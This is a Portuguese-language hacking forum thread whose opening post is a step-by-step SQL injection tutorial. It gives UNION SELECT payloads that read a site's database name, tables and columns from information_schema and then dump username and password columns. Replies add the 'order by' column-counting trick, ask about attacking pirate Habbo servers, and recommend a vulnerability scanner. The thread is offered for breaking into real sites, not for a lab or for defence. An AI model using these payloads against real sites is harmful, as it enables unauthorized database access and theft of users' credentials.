Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

SQL Injection rápido

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    Tutorial SQL Injection rápido


    Tenho um bloco de notas que eu fiz aqui pra mim mesmo quando tava aprendendo sql injection e pegava os sites fácil seguindo meu próprio tuto, não tem explicando o nome de cada comando porque como eu disse, é um "Sql rápido", ou não porém, ótimo para iniciantes, ou não né ;P

    Nome banco de dados


    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3,4,5,6,7,8,9

    no final da url insira :
    from information_schema.tables where table_schema=database()

    e na coluna que aparece no site mude o valor para database() ex:


    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,database(),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()
    =================
    saber o nome das tabelas
    apenas mude o databas() para group_contat(table_name) ex:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()
    ======================
    PARA saber as COLUNAS das tabelas bonitinho, em group_concat(table_name) insira após o table_name isto :
    ,0x3a,column_name) E DEPOIS lá no final da url em "from imformation_schema.tables" toque o tables por columns ex:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,group_concat(table_name,0x3a,column_name),3,4,5, 6,7,8,9 from information_schema.columns where table_schema=database()
    ===================
    e agora ?
    depois de descobrirmos o nome das colunas e das tabelas, vamos verificar o conteúdo das colunas, claro o que você está procurando é o usuário e a senha né ? ;DD ou não, idiota!
    então vamos lá:
    a parte mais fácil ,vc irá pegar o nome da tabela que contém a coluna do login e da senha e vai até o final da url,
    a partir do "from" vc apaga tudo e coloca assim "from Nome_da_tabela" ex:


    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,group_concat(table_name,0x3a,column_name),3,4,5, 6,7,8,9 from nome_da_tabela

    E AGORA ABEXTADO! vamos lá no group_concat onde tinhamos os nomes das tabelas e colunas e simplesmente trocanos o nome "table_name" e "column_name"
    pelo nome nome das colunas EXEMPLO, usuário e senha... vejamos



    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,group_concat(usuario,0x3a,senha),3,4,5,6,7,8,9 from adm_usuarios


    Créditos: Ohniugan
    ---


    Agradeça a todos que ajudam bastando clicar em "Obrigado"
    Tags: Nenhum(a)
    • Top
  • Font Size
    #2
    Eu gostei do poste.
    Legal seria continuar assim, com postes rápidos que nem esse. são muito úteis no começo.
    valeu.
    Não Acha Estranha Essa Frase:
    Eu Sou Hacker e Uso Windows XP!

    Use Débian, Aprenda Slackware e Brinque Muito Com Back|Track


    Fã ->Nickguitar.dll


    Quer ajudar nossso fórum e não sabe como?
    Então click na imagem e ajude-nos com os links off
    • Top

    Comment

    • Font Size
      #3
      Não consigo...quando coloco union all select 1,2,3... ao em vez de dar um erro para eu ir descobrindo quantas colunas tem o site carrega normalmente.
      • Top

      Comment

      • Font Size
        #4
        Postado Originalmente por Criyzzy Ver Post
        Não consigo...quando coloco union all select 1,2,3... ao em vez de dar um erro para eu ir descobrindo quantas colunas tem o site carrega normalmente.
        amigo pra descobrir as colunas vc usa o order by XX depois vc usa o union all select pra juntar essas colunas entendeu?
        ---


        Agradeça a todos que ajudam bastando clicar em "Obrigado"
        • Top

        Comment

        • Font Size
          #5
          Muito obrigado esclareceu muita coisa agora acho que entendi
          • Top

          Comment

          • Font Size
            #6
            Não curto muito defacer, porem cara... valeu mesmo, vai ser com certeza MUITO útil pra quem estiver começando, qualquer coisa pode falar msn amigo , eh nóis truta!
            A ausência de Deus no coração não significa necessariamente a ausência de !
            Tio, que Deus o receba em seus braços calorosos e assim faça de ti a eternidade.
            Meus Tópicos:
            Indíce - Paginas Fake
            Indíce - Trojans / Rats
            Indíce - Keyloggers
            • Top

            Comment

            • Font Size
              #7
              Parabéns, eu fiz a mesma coisa aqui para aprender SQL Injection ! xD ^^
              "Sou a única certeza que vocês terão em toda a VIDA de vocês, eu tardo mais não falho !!! Tenho a certeza que algum dia irei visitar todos vocês"



              • Top

              Comment

              • Font Size
                #8
                Opa,nao gosto de defacer mas e muio utl para o forum.
                Valew,ate.
                • Top

                Comment

                • Font Size
                  #9
                  KKK, eu escrevia no meu caderno de Inglês de escola.
                  Gostei da Iniciativa, isso deve ajudar muitos.
                  • Top

                  Comment

                  • Font Size
                    #10
                    Tem como fazer isso em habbo pirata vulnerável?
                    Pq tipo eu n consigo, eu uso essa string pra ver se é vulnerável:
                    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
                    se aparecer uma mensagem que vc foi banido é pq é vulnerável e se carregar normal, é pq ñ é vulnerável
                    daí qdo eu uso o comando Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... order by 1 (no lugar do 1 eu posso botar qualquer n° até 1000000 q carrega normalmente)
                    Por isso q não consigo daí tenho q ir pro havij só q ele só suporta a port 80 aí é fogo...
                    e o SQL Helper aqui no meu pc n funfa, qdo tento extrair ele da erro!
                    • Top

                    Comment

                    • Font Size
                      #11
                      Postado Originalmente por H@CKER Ver Post
                      Tem como fazer isso em habbo pirata vulnerável?
                      Pq tipo eu n consigo, eu uso essa string pra ver se é vulnerável:
                      Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
                      se aparecer uma mensagem que vc foi banido é pq é vulnerável e se carregar normal, é pq ñ é vulnerável
                      daí qdo eu uso o comando Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... order by 1 (no lugar do 1 eu posso botar qualquer n° até 1000000 q carrega normalmente)
                      Por isso q não consigo daí tenho q ir pro havij só q ele só suporta a port 80 aí é fogo...
                      e o SQL Helper aqui no meu pc n funfa, qdo tento extrair ele da erro!
                      Usa o acunetix que ele verifica todas as vuls que o site tem
                      ---


                      Agradeça a todos que ajudam bastando clicar em "Obrigado"
                      • Top

                      Comment

                      Anterior template Avançar
                      X
                      Working...
                      X